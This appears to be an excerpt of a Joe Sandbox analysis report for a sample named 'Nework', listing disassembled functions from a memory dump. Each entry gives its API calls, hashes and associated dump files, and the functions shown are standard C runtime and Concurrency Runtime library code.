Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a6a370f02806502358d4cdb0eda7adc5707806d609459a61d4ee35b564d22f20
Instruction ID: 5940f2aefd564ed63a7cdc7ef6f0bbf0d5f761577a864e5e4b19fbc8dc02fcb6
Opcode Fuzzy Hash: a6a370f02806502358d4cdb0eda7adc5707806d609459a61d4ee35b564d22f20
Instruction Fuzzy Hash: A1D06C3201014DBBDF028F84DC46EDE3BAAFB4C714F014100FA1856020C772E8A1AB90

Function 00198622 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 00198629

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 22f08fd6fd80d1a032583c0aefafd594ad0c9b57767944427b0c74bec54b3160
Instruction ID: efd322e85f925f63e48bcf43a158095c605beb0a642efaa29f3afd47bf12ccb4
Opcode Fuzzy Hash: 22f08fd6fd80d1a032583c0aefafd594ad0c9b57767944427b0c74bec54b3160
Instruction Fuzzy Hash: 92C08C300016000AEE1C0A386A980A833029A873F97D81BC9F0718E0F1CB3D5887D700

Function 00198620 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 00198629

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 158e11a8166edd8e2666ee9d5fe9f74334524920b28f8b13fc29ec8c50e34cdb
Instruction ID: 781a49365933df1029bfbf559f0c1ed57061e49c9ace54842c52cbf04bbad028
Opcode Fuzzy Hash: 158e11a8166edd8e2666ee9d5fe9f74334524920b28f8b13fc29ec8c50e34cdb
Instruction Fuzzy Hash: 07C080300011004BDE1C4B3866580243311DA433693E40B8DF0318E0F1CB3AC443C710

Non-executed Functions

Function 001B1462 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B2B5C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 001B2B6F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 001B1474

Part of subcall function 001B2C6F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 001B2C99
Part of subcall function 001B2C6F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 001B2D08

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 001B15A6
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 001B1606
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 001B1612
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 001B164D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 001B166E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 001B167A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 001B1683
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 001B169B

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 0b7cec64787836f0520ea9128dbe135ce0fabec369e7e314b1f95f992fceb01a
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: AC815C71E00225AFCB19DFA9C5A09BDB7B6FF89304B5646ADE406A7705C770ED42CB80

Function 001BEAA8 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BEAE1

Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001BEB47
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 001BEB5F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 001BEB6C

Part of subcall function 001BE60F: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 001BE637
Part of subcall function 001BE60F: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 001BE6CF
Part of subcall function 001BE60F: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 001BE6D9
Part of subcall function 001BE60F: Concurrency::location::_Assign.LIBCMT ref: 001BE70D
Part of subcall function 001BE60F: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE715

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: c3deb9db64fa37085b00643d6f0dc9ec229c6a40544ee29cd51d2e735bc4a113
Instruction ID: 68cbc823520d70babca9e0393939d81bbd15630fc92091ead7b8333dd0b5293c
Opcode Fuzzy Hash: c3deb9db64fa37085b00643d6f0dc9ec229c6a40544ee29cd51d2e735bc4a113
Instruction Fuzzy Hash: 6E519131A002059BCF29DF50C989FEDBBB5AF59310F1540A9E9067B392CB71AE45CBA1

Function 001D2307 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001D2389
_free.LIBCMT ref: 001D23AD
_free.LIBCMT ref: 001D253A
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001E6758), ref: 001D254C
_free.LIBCMT ref: 001D2706

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 840aa07ee4379f2eafad49e0a4fce14c445609aa9ebf7e716d3d82572980541f
Instruction ID: 7e77236b008290b63510ee4b6ee8a56d31fc79cb508dfb36d207af7902b1f2d0
Opcode Fuzzy Hash: 840aa07ee4379f2eafad49e0a4fce14c445609aa9ebf7e716d3d82572980541f
Instruction Fuzzy Hash: 5CC13671A00209AFDB249F68DC41BBA7BB9AF75314F24019BE865D7341EB34DE45CB50

Function 001AC9F7 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 001ACA0A

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: e0181241b5b8019612f8ca8d979f233d7c1d81399754ddeb18c35af3804e5508
Instruction ID: 17d2f70c967ad6285ba638cb30caf8d61a3b27876b5cf58d6865e26dc12ea12a
Opcode Fuzzy Hash: e0181241b5b8019612f8ca8d979f233d7c1d81399754ddeb18c35af3804e5508
Instruction Fuzzy Hash: 93B09232A03874478B966B94BC885AD77559B85AA130B0156DA01AB624CB501CC28BD5

Function 001C252E Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001C2540

Part of subcall function 001C233E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C2361

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001C2561
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001C256E
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 001C25BC
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 001C2643
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 001C2656
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 001C26A3

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 3b87af610c14883dc56f24ee5bb99e071151e3733b46b5c294daca249561b337
Instruction ID: 1099f52855b4b5745ff7d36f8c30364ea80980b13eafcd3d783b545fedbb8168
Opcode Fuzzy Hash: 3b87af610c14883dc56f24ee5bb99e071151e3733b46b5c294daca249561b337
Instruction Fuzzy Hash: 3C815734900249ABDF169FA4C995FEE7BB2AF76304F04009CEC416B292C776CD66DB61

Function 001B433E Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 001B4398

Part of subcall function 001B4179: RtlInitializeSListHead.NTDLL(?), ref: 001B4245
Part of subcall function 001B4179: RtlInitializeSListHead.NTDLL(?), ref: 001B424F

ListArray.LIBCONCRT ref: 001B43CC
Hash.LIBCMT ref: 001B4435
Hash.LIBCMT ref: 001B4445
RtlInitializeSListHead.NTDLL(?), ref: 001B44DA
RtlInitializeSListHead.NTDLL(?), ref: 001B44E7
RtlInitializeSListHead.NTDLL(?), ref: 001B44F4
RtlInitializeSListHead.NTDLL(?), ref: 001B4501

Part of subcall function 001B9AA1: std::bad_exception::bad_exception.LIBCMT ref: 001B9AC3

RegisterWaitForSingleObject.KERNEL32(?,00000000,001B7875,?,000000FF,00000000), ref: 001B4589
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 001B45AB
GetLastError.KERNEL32(001B52EB,?,?,00000000,?,?), ref: 001B45BD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 001B45DA

Part of subcall function 001AFA0A: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,001B52EB,00000008,?,001B45DF,?,00000000,001B7866,?,7FFFFFFF,7FFFFFFF,00000000), ref: 001AFA22

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001B4604

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: b15f579eef589e984089adb0d21d395fd9b09c13b9bbfae7d4773053f062627e
Instruction ID: acdb124546eee6adc9d9a6190b68f2838fe420b1c78c5d1dc0b622bd8cc707aa
Opcode Fuzzy Hash: b15f579eef589e984089adb0d21d395fd9b09c13b9bbfae7d4773053f062627e
Instruction Fuzzy Hash: B8816DB0A11A56FBD718DF78C885BD9FBA8BF19700F00421AF528D7281CBB4A564CBD0

Function 001B2692 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 001B26A1

Part of subcall function 001B398C: GetVersionExW.KERNEL32(?), ref: 001B39B0
Part of subcall function 001B398C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 001B3A4F

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 001B26B5
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 001B26D6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B273F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B2773

Part of subcall function 001B064D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 001B066D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 001B27F3

Part of subcall function 001B21BC: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 001B21D0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B283B

Part of subcall function 001B0622: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B063E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B284F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B2860
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 001B28AD
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 001B28D2
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 001B28DE

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: bd11cde1c4786190447221f311736851847c8ad91df35feaaee2a1a90394dd0b
Instruction ID: 8a7724ad452d71785a2ddec08daa45008d7fc27720ca5a0fbff58ba3edd235ce
Opcode Fuzzy Hash: bd11cde1c4786190447221f311736851847c8ad91df35feaaee2a1a90394dd0b
Instruction Fuzzy Hash: D181EF31A006169FCB18DFA9D8E05FEBBF2FB68300B65412DD545E7A50DB309D99CB84

Function 001CF14F Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001CF193

Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED49
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED5B
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED6D
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED7F
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CED91
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDA3
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDB5
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDC7
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDD9
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDEB
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEDFD
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEE0F
Part of subcall function 001CED2C: _free.LIBCMT ref: 001CEE21

_free.LIBCMT ref: 001CF188

Part of subcall function 001CABE5: HeapFree.KERNEL32(00000000,00000000,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?), ref: 001CABFB
Part of subcall function 001CABE5: GetLastError.KERNEL32(?,?,001CEEBD,?,00000000,?,?,?,001CEEE4,?,00000007,?,?,001CF2E6,?,?), ref: 001CAC0D

_free.LIBCMT ref: 001CF1AA
_free.LIBCMT ref: 001CF1BF
_free.LIBCMT ref: 001CF1CA
_free.LIBCMT ref: 001CF1EC
_free.LIBCMT ref: 001CF1FF
_free.LIBCMT ref: 001CF20D
_free.LIBCMT ref: 001CF218
_free.LIBCMT ref: 001CF250
_free.LIBCMT ref: 001CF257
_free.LIBCMT ref: 001CF274
_free.LIBCMT ref: 001CF28C

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: dacdcd9b5e378f0e6b87874dd8c0962c46a20f4bd77032aa6b81fbbabc4e1ecc
Instruction ID: 408789f3e287dc63586a5fd4a8429d214d610820216ffbbd327bf7061e624a7d
Opcode Fuzzy Hash: dacdcd9b5e378f0e6b87874dd8c0962c46a20f4bd77032aa6b81fbbabc4e1ecc
Instruction Fuzzy Hash: DE317A32604208DFEB26AA78D945F5AB3EAAF30320F54452DE549D7191DF30FC81CB11

Function 001AF8D1 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,001B3A46), ref: 001AF8DF
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 001AF8ED
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 001AF8FB
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 001AF929
GetLastError.KERNEL32(?,?,?,001B3A46), ref: 001AF944
GetLastError.KERNEL32(?,?,?,001B3A46), ref: 001AF950
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001AF966

Strings

GetCurrentProcessorNumberEx, xrefs: 001AF91E
GetThreadGroupAffinity, xrefs: 001AF8F3
SetThreadGroupAffinity, xrefs: 001AF8E7
kernel32.dll, xrefs: 001AF8DA

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: f9fb4495c4aa91a0d0aef47ad2f9af3ddb1507a6d3abffaac195f9e91422c61c
Instruction ID: 9ff0095eb6aaf6963c22f1af7d93f47a07d7a826759bccaa1bc313a9b52923dc
Opcode Fuzzy Hash: f9fb4495c4aa91a0d0aef47ad2f9af3ddb1507a6d3abffaac195f9e91422c61c
Instruction Fuzzy Hash: 2E01A179900751BAD7117BF5AC8AF7F37ACAF09755704043AF502D6562EBB4C8818760

Function 001C5105 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 001C5200
type_info::operator==.LIBVCRUNTIME ref: 001C5227
___TypeMatch.LIBVCRUNTIME ref: 001C5333
CatchIt.LIBVCRUNTIME ref: 001C5388
IsInExceptionSpec.LIBVCRUNTIME ref: 001C540E
_UnwindNestedFrames.LIBCMT ref: 001C5495
CallUnexpected.LIBVCRUNTIME ref: 001C54B0

Strings

csm, xrefs: 001C5140
csm, xrefs: 001C525E
csm, xrefs: 001C51AD

Memory Dump Source

Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true

Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_190000_Nework.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: fc0a2e1d5a593b9155d86076cbc9ce4ac485ad2e54972cb95c1d18bfe5fd176b
Instruction ID: e1eed80cd72ff0ba8bb923223af4b05543086c47e5a4d138124075528ce4b4fa
Opcode Fuzzy Hash: fc0a2e1d5a593b9155d86076cbc9ce4ac485ad2e54972cb95c1d18bfe5fd176b
Instruction Fuzzy Hash: FFC15B71800A09DFCF19DFA4C881EAEBBB6BF34315F14415EE8156B212E771EA91CB91

Function 001C27CD Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001C27DF

Part of subcall function 001C233E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C2361

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001C2800
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001C280D
